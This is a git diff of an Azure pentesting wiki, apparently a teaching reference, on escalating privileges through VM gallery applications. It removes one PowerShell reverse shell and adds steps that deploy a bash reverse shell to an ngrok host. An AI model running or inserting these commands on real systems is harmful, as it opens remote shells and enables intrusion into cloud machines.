diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md index 4e7bd63f7..c3a1c4890 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md @@ -232,11 +232,6 @@ export URL_PACKAGE=$(az storage blob generate-sas \ --https-only \ --full-uri \ -o tsv) - -# Alternative commands for Powrhsell reverse shell -## Note that this would be detected by Defender (but it's an extarting point) -## Add in the install, remove and update commands -echo '$client = New-Object System.Net.Sockets.TCPClient(\"6.tcp.eu.ngrok.io\",19507);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64 ``` {{#endtab }} @@ -280,6 +275,109 @@ az vm application set \ --name deleteme-win4 \ --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellAppWin/versions/1.0.0 \ --treat-deployment-as-failure true + +# You can create a SAS URL from a blob with something like: +export EXPIRY=$(date -u -v +1d '+%Y-%m-%dT%H:%MZ') +export URL_PACKAGE=$(az storage blob generate-sas \ + --account-name \ + --container-name \ + --name \ + --permissions r \ + --expiry "$EXPIRY" \ + --https-only \ + --full-uri \ + -o tsv) +``` + +{{#endtab }} + +{{#tab name="Az" }} + +```bash +##### GET VM ##### + +Get-AzVm +# Check that location is "Central US", the gallery and app mUST be in the same location + +$vmName="vm-name" + + + +##### CREATE SAS TOKEN TO USE IN A USELESS BLOB ##### + +$rg="rg-name" + +# Get and set storage account +Get-AzStorageAccount + +$accountName = "account-name" + +# Get and set container inside the storage +Get-AzStorageContainer -Context (Get-AzStorageAccount -name $accountName -ResourceGroupName $rg).context + +$containerName = "container-name" + +# Upload dummy file +$key = (Get-AzStorageAccountKey -ResourceGroupName $rg -Name $accountName)[0].Value +$ctx = New-AzStorageContext -StorageAccountName $accountName -StorageAccountKey $key +echo "test" > /tmp/test.txt +$blobName = "test.txt" +Set-AzStorageBlobContent -File /tmp/test.txt -Container $containerName -Blob "$blobName" -Context $ctx + +# Generate SAS token +$expiry = (Get-Date).ToUniversalTime().AddDays(1).ToString("yyyy-MM-ddTHH:mmZ") +$sasToken = New-AzStorageBlobSASToken ` + -Container $containerName ` + -Blob $blobName ` + -Permission r ` + -ExpiryTime $expiry ` + -FullUri ` + -Context $ctx + + + +##### CREATE GALLERY AND APP ##### + +$rg = "rg-name" +$location = "Central US" +$galleryName = "myGallery" +$appName = "myReverseShellApp" +$subscription="subscription-id" + +# Create gallery +New-AzGallery -ResourceGroupName $rg -Name $galleryName -Location $location + +# Create app in gallery +New-AzGalleryApplication ` + -ResourceGroupName $rg ` + -GalleryName $galleryName ` + -Name $appName ` + -Location $location ` + -SupportedOSType Linux + + +# Create app version +$versionName = "1.0.2" +## create ngrok listener + +New-AzGalleryApplicationVersion ` + -ResourceGroupName $rg ` + -GalleryName $galleryName ` + -GalleryApplicationName $appName ` + -Name $versionName ` + -Location $location ` + -PackageFileLink "$sasToken" ` + -Install "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/19334 0>&1'" ` + -Remove "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/19334 0>&1'" ` + -Update "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/19334 0>&1'" + + +# Launch app +$appVersionId = "/subscriptions/$subscription/resourceGroups/$rg/providers/Microsoft.Compute/galleries/$galleryName/applications/$appName/versions/$versionName" +$app = New-AzVmGalleryApplication -PackageReferenceId $appVersionId +$vm = Get-AzVM -ResourceGroupName $rg -Name $vmName +Add-AzVmGalleryApplication -VM $vm -GalleryApplication $app +Update-AzVM -ResourceGroupName $rg -VM $vm ``` {{#endtab }} diff --git a/src/pentesting-cloud/azure-security/az-services/az-azuread.md b/src/pentesting-cloud/azure-security/az-services/az-azuread.md index d01effdb4..6d387a0f8 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-azuread.md +++ b/src/pentesting-cloud/azure-security/az-services/az-azuread.md @@ -101,7 +101,7 @@ Connect-AzAccount -Credential $creds # Connect with access token Connect-AzAccount -AccountId test@corp.onmicrosoft.com [-AccessToken $ManagementToken] [-GraphAccessToken $AADGraphToken] [-MicrosoftGraphAccessToken $MicrosoftGraphToken] [-KeyVaultAccessToken $KeyVaultToken] -# If connecting with some metadata token just use "-AccountId asdasd@example.com" and it will work +# If connecting with some metadata token, in "-AccountId" put the OID of the managed identity (get it from the JWT token) # Connect with Service principal/enterprise app secret $password = ConvertTo-SecureString 'KWEFNOIRFIPMWL.--DWPNVFI._EDWWEF_ADF~SODNFBWRBIF' -AsPlainText -Force